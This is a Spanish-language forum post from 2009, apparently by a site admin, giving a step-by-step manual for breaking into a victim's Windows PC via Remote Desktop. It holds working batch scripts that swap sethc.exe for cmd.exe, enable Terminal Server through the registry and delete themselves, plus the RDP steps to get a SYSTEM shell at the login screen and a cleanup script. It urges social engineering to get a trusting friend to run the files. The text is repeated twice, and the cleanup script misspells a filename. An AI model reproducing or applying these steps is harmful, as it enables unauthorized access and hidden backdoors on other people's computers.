Manual - Hackear por Escritorio Remoto de Windows (Por Puerto 3389)
Página 1 de 1.
Manual - Hackear por Escritorio Remoto de Windows (Por Puerto 3389)
yonny Miér Jul 15, 2009 8:50 pm
Hackear por Escritorio Remoto de Windows
1)Escanear los puertos, para ver si tiene el puerto 3389 (El de escritorio
remoto)abierto, si es que tiene el puerto habilitado seguir el paso 2), si es que el puerto y Escritorio Remoto no esta funcionando el pasar al paso 2.1):
2)Crear un batch que haga los siguiente:
Código:
Este batch lo que hace es crearnos un agujero para poder pasar. Setch es el programita que inicia cuando presionamos 5 veses Shift. Tambien es posible utilizar Sethc.exe en el escritorio Remoto de Windows.
Luego de alguna forma mandamos el batch a nuestra victima y cuando lo abra nos abrira el paso
y el batch se autoborrara.
2.1)Si es que no tiene habilitado el "Escritorio Remoto de Windows" creamos
el siguiente Batch para activarlo y crear el agujero que nos dejara pasar.
Código:
"Escritorio Remoto de Windows" y nos abrira el paso y el Batch se AutoBorrara.
3)Luego abrimos Inicio/programas/Accesorios/comunicaciones/ConeXion a escritorio remoto
Presionamos opciones, y rellenamos los datos de la pestaña General de la siguiente forma:
Equipo:1.2.3.4 <- Direcciona IP de la victima
Nombre de Usuario: <-No ponemos nada lo dejamos Vacio
Contraseña: <-Lo dejamos vacio.
Dominio: <-Lo dejamos vacio.
Luego nos pasamos a la pestaña "Recursos locales"
y cambiamos solo la opcion "Teclado", desplegamos la lista y seleccionamos "En el equipo remoto"
4)Luego click en conectar.
5)Cuando nos salga la ventanita pidiendo USER/PASS presionamos 5 veses SHIFT y nos saldra la ventanita de DOS en el equipo remoto y STICKYKEYS en nuestra maquina, el STICKYKEYS de nuestra maquina lo cerramos para que no nos moleste.
6)Ahora tenemos acceso a la raiz osea como SYSTEM (NT AUTHORITY\SYSTEM) teniendo es DOS en la mano, podemos iniciar algunos servicios como ser el telnet, o podemos modificar algunas cosas de su PC. (Esto si quieren, inicien: Compmgmt.msc).
7)Para finalizar debemos borrar el programa que nos dejo pasar, Recuerdan que hize una copia de Sethc.exe a Sethc.zzz ahora tenemos que volver las cosas como estaban.
Código:
Microsoft creo "Escritorio Remoto de Windows" para que lo Explotemos
y lo usemos cuando no tengamos un troyano ha mano. (Claro que tambien es una herramienta util..)
EXPLICACION DEL MANUAL.
Cuando enciendes un ordenador, normalmente pide un user y un pass, se podría cambiando los valores de CMD por StickyKeys, cuando estas para meter la pass, pulsas 5 veces shift, y se abriría CMD, ya desde ahí podrías ejecutar servicios, etc...
Con ingenieria social intentariamos colar los .bat
Por ejemplo, quieres entrar al de tu amigo (uno que se confie), le pasas los bats, te haces con su ip, y lo intentas jeje
Saludoss!!
AGRADESCAN
1)Escanear los puertos, para ver si tiene el puerto 3389 (El de escritorio
remoto)abierto, si es que tiene el puerto habilitado seguir el paso 2), si es que el puerto y Escritorio Remoto no esta funcionando el pasar al paso 2.1):
2)Crear un batch que haga los siguiente:
Código:
- Spoiler:
- echo off
title .
Copy "c:\windows\system32\sethc.exe" "c:\windows\system32\sethc.zzz"
Copy "c:\windows\system32\cmd.exe" "c:\windows\system32\sethc.exe"
del %0
exit
Este batch lo que hace es crearnos un agujero para poder pasar. Setch es el programita que inicia cuando presionamos 5 veses Shift. Tambien es posible utilizar Sethc.exe en el escritorio Remoto de Windows.
Luego de alguna forma mandamos el batch a nuestra victima y cuando lo abra nos abrira el paso
y el batch se autoborrara.
2.1)Si es que no tiene habilitado el "Escritorio Remoto de Windows" creamos
el siguiente Batch para activarlo y crear el agujero que nos dejara pasar.
Código:
- Spoiler:
- echo off
title .
cls
Copy "c:\windows\system32\sethc.exe" "c:\windows\system32\sethc.zzz"
Copy "c:\windows\system32\cmd.exe" "c:\windows\system32\sethc.exe"
reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnect ions /f
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnect ions /t "REG_DWORD" /d 0
del %0
exit
"Escritorio Remoto de Windows" y nos abrira el paso y el Batch se AutoBorrara.
3)Luego abrimos Inicio/programas/Accesorios/comunicaciones/ConeXion a escritorio remoto
Presionamos opciones, y rellenamos los datos de la pestaña General de la siguiente forma:
Equipo:1.2.3.4 <- Direcciona IP de la victima
Nombre de Usuario: <-No ponemos nada lo dejamos Vacio
Contraseña: <-Lo dejamos vacio.
Dominio: <-Lo dejamos vacio.
Luego nos pasamos a la pestaña "Recursos locales"
y cambiamos solo la opcion "Teclado", desplegamos la lista y seleccionamos "En el equipo remoto"
4)Luego click en conectar.
5)Cuando nos salga la ventanita pidiendo USER/PASS presionamos 5 veses SHIFT y nos saldra la ventanita de DOS en el equipo remoto y STICKYKEYS en nuestra maquina, el STICKYKEYS de nuestra maquina lo cerramos para que no nos moleste.
6)Ahora tenemos acceso a la raiz osea como SYSTEM (NT AUTHORITY\SYSTEM) teniendo es DOS en la mano, podemos iniciar algunos servicios como ser el telnet, o podemos modificar algunas cosas de su PC. (Esto si quieren, inicien: Compmgmt.msc).
7)Para finalizar debemos borrar el programa que nos dejo pasar, Recuerdan que hize una copia de Sethc.exe a Sethc.zzz ahora tenemos que volver las cosas como estaban.
Código:
- Spoiler:
- copy "c:\windows\system32\setch.zzz" "c:\windows\system32\setch.exe"
del "c:\windows\system32\setch.zzz"
Microsoft creo "Escritorio Remoto de Windows" para que lo Explotemos
y lo usemos cuando no tengamos un troyano ha mano. (Claro que tambien es una herramienta util..)
EXPLICACION DEL MANUAL.
Cuando enciendes un ordenador, normalmente pide un user y un pass, se podría cambiando los valores de CMD por StickyKeys, cuando estas para meter la pass, pulsas 5 veces shift, y se abriría CMD, ya desde ahí podrías ejecutar servicios, etc...
Con ingenieria social intentariamos colar los .bat
Por ejemplo, quieres entrar al de tu amigo (uno que se confie), le pasas los bats, te haces con su ip, y lo intentas jeje
Saludoss!!
AGRADESCAN
yonny- Admin
- Cantidad de envíos : 271
PUNTOS : 13427
Fecha de inscripción : 02/04/2009
Edad : 31
Localización : san bernardo -
Temas similares» Que Es Windows Mac?
» Las burbujas de Windows Vista en XP
» Cambia el diseño de tu pc a la de Windows Vista
» Ampliar ancho de banda en Windows XP
» Winamp PRO 5.53 [Ultima Version] [Full] / Windows Media Player v11 [Español] [Version Final - Crakeada]
» Las burbujas de Windows Vista en XP
» Cambia el diseño de tu pc a la de Windows Vista
» Ampliar ancho de banda en Windows XP
» Winamp PRO 5.53 [Ultima Version] [Full] / Windows Media Player v11 [Español] [Version Final - Crakeada]
Página 1 de 1.
Permisos de este foro:
No puedes responder a temas en este foro.